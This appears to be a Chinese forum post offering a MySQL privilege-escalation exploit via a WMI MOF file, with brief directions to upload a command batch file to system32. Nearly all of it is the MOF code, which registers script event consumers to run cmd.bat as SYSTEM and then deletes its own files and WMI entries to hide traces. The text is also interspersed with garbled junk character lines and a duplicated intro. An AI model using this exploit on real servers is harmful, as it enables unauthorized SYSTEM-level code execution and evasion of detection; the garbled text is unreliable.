Mysql 提权即时无错Mof exp

admin

这个sql提权MOF需要运行 system下的文件，不能定义路径。
需要将要运行的命令写入到bat上传到system32目录，然后执行。
+ I. R/ r5 N5 H+ F/ z7 ]2 B3 W
这个sql提权MOF需要运行 system下的文件，不能定义路径。
需要将要运行的命令写入到bat上传到system32目录，然后执行。
) O2 O, d0 j6 X( i
#pragma
                        namespace("\\\\.\\root\\cimv2")
& y6 W  A+ X/ W1 M9 S; G" _5 O! s                        class
& ^" k2 C6 T: F# r; \1 E5 N! a                        MyClass547
                        {           [key]
9 ~- v/ q4 L; v                        string
                        Name;
* n. z- z- `* L                        };
$ a" ~) Q) n9 C, a  a& X  l                        class
2 Y( d5 Z6 t, e                        ActiveScriptEventConsumer
! o! k( [  v- D                        : __EventConsumer {          [key]
                        string
                        Name;           [not_null]
                        string
' x; ~0 c* d: F; b% L1 l4 S' Y$ x* F                        ScriptingEngine;           string
                        ScriptFileName;           [template]
                        string
                        ScriptText;         uint32 KillTimeout;
+ e' y0 J1 C6 k  s                        }; instance of __Win32Provider as $P {
4 x7 |$ s+ i# ]  r* L                        Name
                        =
                        "ActiveScriptEventConsumer";     CLSID =
                        "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
                        PerUserInitialization
                        = TRUE;
1 w  d+ q; E8 j& t4 Z1 D& ~                        }; instance of __EventConsumerProviderRegistration {         Provider
/ v1 E$ p" y. o" C                        = $P;         ConsumerClassNames
1 i3 z6 T+ {' F5 ^$ P7 e* Q4 X                        =
                        {"ActiveScriptEventConsumer"};
7 k" m/ X/ D& h/ A                        };
3 u# d+ w8 ?1 p, V+ M                        Instance of ActiveScriptEventConsumer
                        as $cons {         Name
8 o2 w8 P- W3 g                        =
+ \3 g% U% S1 X- S4 E' Z) P2 b                        "ASEC";         ScriptingEngine
                        =
                        "JScript";         ScriptText
0 X- h5 T$ [7 _                        =
                        "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";          };
/ D) \; ^1 l/ P                        Instance of ActiveScriptEventConsumer
" J! F4 f  `: o  m/ `( ^                        as $cons2 {         Name
. T+ Z8 `  _/ W! Q" @5 O, l' {# u                        =
* D$ ^- Z$ u# B7 u5 Z) B: A                        "qndASEC";         ScriptingEngine
7 a6 D" Q" u8 _8 {/ R* s) G0 u                        =
9 ?! X, H, h5 A0 l                        "JScript";         ScriptText
- ^7 S4 w! K! v  n                        =
                        "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
                        }; instance of __EventFilter as $Filt {         Name
8 w* ?7 Z8 U8 K                        =
. m, A! Z( Z) [: E0 S3 X& {( ?                        "instfilt";         Query
                        =
: _, ]/ }) M' T8 T1 ^                        "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";         QueryLanguage
& e6 w& c4 `' f  k4 w8 l                        =
                        "WQL";         }; instance of __EventFilter as $Filt2 {         Name
5 t2 W/ R; c1 l  Z8 a                        =
                        "qndfilt";         Query
7 P4 d( {) W# W2 B                        =
                        "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";         QueryLanguage
                        =
                        "WQL";          }; instance of __FilterToConsumerBinding as $bind {         Consumer
' s) {$ g' A$ a% o                        = $cons;         Filter
( P, a, P9 n4 v/ r# k8 A$ ?  Z8 U                        = $Filt;
                        }; instance of __FilterToConsumerBinding as $bind2 {         Consumer
                        = $cons2;         Filter
                        = $Filt2;
! @* a, C! u4 @. m                        }; instance of MyClass547
                        as $MyClass {         Name
                        =
0 m# a) A' i& L& ?/ E                        "ClassConsumer";
$ _! W' N9 s$ D6 K2 ], H: n7 q                        };